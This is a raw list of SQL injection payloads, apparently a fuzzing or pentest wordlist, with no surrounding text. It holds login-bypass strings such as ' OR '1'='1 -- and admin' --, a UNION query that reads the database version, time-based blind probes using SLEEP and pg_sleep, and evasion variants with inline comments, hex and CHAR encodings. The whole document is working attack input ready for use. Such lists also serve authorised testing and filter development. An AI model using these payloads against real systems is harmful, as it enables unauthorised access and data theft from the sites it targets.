admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
' UNION ALL SELECT 1, @@version;#
' or 1=1 limit 1 -- -+
' or 1=1 LIMIT 1;#
' OR '1'='1 --
" OR "1"="1 --
') OR ('1'='1
admin' --
admin' #
' OR SLEEP(5)--
" OR pg_sleep(5)--
' OR '1'='1' --
' OR '1'='1' #
' OR '1'='1'/*
" OR "1"="1" --
" OR "1"="1" #
or 1=1--
or 1=1#
or 1=1/*
') OR ('1'='1
' OR 1=1-- -
' OR 1=1--+
' OR 1=1--a
') OR '1'='1' --
') OR '1'='1'#
") OR "1"="1"--
") OR "1"="1"#
' OR 'x'='x' --
" OR "x"="x" --
admin'//OR//'1'='1
' or '1'='1'--+
' OR 1=1;%00
' OR ''='
' OR 'a'='a
' OR 1=1#
' OR '1'='1'/*
' OR '1'='1' LIMIT 1 -- -
' oR 1=1--
' Or 1=1--
' or/*ICF*/1=1--
' OR+1=1--
' OR 'a'='a'--
' OR 'a' LIKE 'a
' OR 'a' IN ('a')
' OR 'aa'>'a'
' OR 'a'='a'--
' OR 'a' LIKE 'a
' OR 'a' IN ('a')
' OR 'aa'>'a'
' OR (SELECT 1)=1--
' OR EXISTS(SELECT 1)--
' OR (1=1) IN (SELECT 1)--
' OR 1=CHAR(49)--
' OR 0x31=0x31--
' OR 'a' = N'a'--
